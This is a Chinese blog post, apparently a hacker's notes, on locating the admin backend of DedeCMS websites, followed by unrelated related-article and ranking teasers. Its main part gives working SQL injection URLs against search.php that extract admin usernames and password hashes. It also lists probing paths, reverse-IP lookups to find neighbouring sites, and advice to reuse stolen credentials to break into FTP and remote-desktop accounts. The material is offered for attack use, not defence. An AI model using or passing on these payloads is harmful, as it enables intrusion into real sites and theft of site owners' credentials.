dedecms站找后台的一些经验

首先:

注入exp

有时候 有些 /plus/目录换成了 /plugins目录

/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[ uNion ]=a

/robots.txt

/data/admin/ver.txt

/data/mysql_error_trace.inc

第一 个看这里 /data/mysql_error_trace.inc 爆出来补 

第二 个  域名作为后台 或者域名变形一下

第三 个 先ping域名 获得ip地址 之后 

http://www.bing.com/

搜索 ip:127.0.0.1  php 有可能获得后台 也可以获得其他旁注站 一般dedecms的旁站很多也是dedecms 的  

第四 个  查看 robots.txt

http://www.dedecms.com/robots.txt  查看旁注站dedecms的站  再去社工目标站的后台地址也可以

第五 个  注入exp得到账号 去社工 ftp 和 3389密码 

更多相关文章
  •  貌似很纠结,今天去暗组转了一圈,看到某牛发的一个帖子,是一找后台的大黑阔去非你莫属找工作的视频,看完以后我凌乱了,艹,这个黑阔真心S+B,你们看视频吧,http://static.video.qq.com/TPout.swf?vid=h001295l7ee&auto=1第一,我觉的他的记忆 ...
  •      国庆放假后我和我们班的几个同学就来到长沙.开始了我们找工作的历程,因为我们全都是从学校刚出来,社会阅历不足,到了这个让我们几个觉得陌生的城市,人生地不熟真的是不知该从何从着手,我们都只知道唯一的途径那就是人才招聘会,     我现在来长沙十多天了,找了几天的工作,体会到了现在社会上的竞争是 ...
  • 当老板问你是否要休息时,多半他是不希望你休息的. 你的第一份工作非常重要,不要轻易跳草,等你做满一年以上时,你会清楚你是否真的需要跳跳. 工作2-3年后,一定要弄清自己的职业方向在哪里.不然你会越走越迷惘. 定了职业方向你一定要坚持走下去,不要轻言放弃.要知道,无论哪个行业,只要你选对了方向,只要你 ...
  • 求百科 apache+php+mysql 在cenos32位安装完后搭建dedeCMS网站后台验证码不显示环境:apache2.2.22 php 5.2.17 mysql 5.1.37 编译安装完后所apache的安装:#./configure --prefix=/usr/local/apache ...
  • 一.网站策划书:为什么要制作网站?网站提供什么内容?设计什么样的风格适合网站?站点制作步骤布局及模块分析技术支持及培训安排推广方案二.网站策划都做什么?1.进行市场调查(根据网站定位进行的市场调查,方式:网络.现实填表.)2.确定网站规模(大型站点.小型站点还是中型站点)3.确定网站的类别及设计特色 ...
  • 上周有幸通过了某知名IT公司的笔试,获得了一次难得的面试经历,说句实在话,可能我参加的面试还不如很多学弟学妹参加的多,一方面是因为学校这边的要求比较严,很难获得实习的机会,另一方面也是我自己的问题,在这方面不算主动,导致到现在还没有真正的实习过一次,想想就觉得是人生一大遗憾啊(此处略去360个字), ...
  • 19种 网站入侵方法1.经典注入通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点2.万能密码OR漏洞万 ...
  • 首先把,主站入手注册一个账号,看下上传点,等等之类的.用google找***入点,格式是Site:XXX.com inurl:asp|php|aspx|jsp最好不要带 www,因为不带的话可以检测二级域名.扫目录,看编辑器和Fckeditor,看下敏感目录,有没有目录遍及,查下是iis6,iis5 ...
一周排行
  • 韩国网页设计资料网页设计大师2JPG+PSD+TXT等73.89G百度云下载
    < 网页设计大师2 >超越第一代版本,提供更新更精美的网页素材模板.全部由国际 ...
  • 电脑公司最新GHOSTWIN7系统32,64位优化精简版下载
     系统来自系统妈:http://www.xitongma.com 电脑公司最新GHOST  ...
  • 选中某一块区域:CTRL+@(CTRL+SHIFT+2)或者CTRL+SPACE 移动光标到合适的位置(CTRL+p.CTRL+n.CTRL+f.CTRL+b分别是向上.下.前.后 来移动光标).剪切快捷键:CTRL ...
  • 这些对老一代的程序员都是老生常谈的东西,没什么新意,对新生代的程序员却充满着魅力.曾经新生代,好多都经过漫长的学习,理解,实践才能掌握委托,表达式树这些应用.今天我尝试用简单的方法叙述一下,让大家在五分钟内看完这篇博 ...
  • 下周计划如下:一.学习网页设计的思想和方法:二.整理好阅读笔记以便查阅:三.每晚总结当天所学知识并巩固牢记:四.良好的作息时间十点准时睡觉,早晨早起.每周都是一个新的开始,每天都是一个新的起点,每一次进步都是为将来做 ...
  • 上个月在旧金山召开的OSBC(开源商务世界大会)上,我有幸与Hyperic的CEO,Javier Soltero坐在一起讨论一些问题.我开门见山地说,"您不需要跟我讲关于您的软件的事情,这些我都了解,我的实 ...
  • 玩转LVS,快速实现负载均衡
    模型一:NAT模型的配置实验环境:    采用VMware虚拟机,版本6.0.5    操 ...
  • 电脑入门配置如果平时只看看股票.上上网.看电影.玩玩普通的网络游戏,这套配置完全可以胜任.CPU: INTEL-G1610主板:技嘉B75M-D3V内存:金士顿DDR333 4G硬盘:西部数据Caviar Bl ...
  • .长相不令人讨厌,如果长得不好,就让自己有才气:如果才气也没有,那就总是微笑.2.气质是关键.如果时尚学不好,宁愿纯朴.3.与人握手时,可多握一会儿.真诚是宝.4.不必什么都用"我"做主语.5.不 ...
  • PHP支付接口RSA验证
    这几天一直困扰的PHP RSA签名验证问题终于解决了,在这里记录一下.据我所知,国内大部分 ...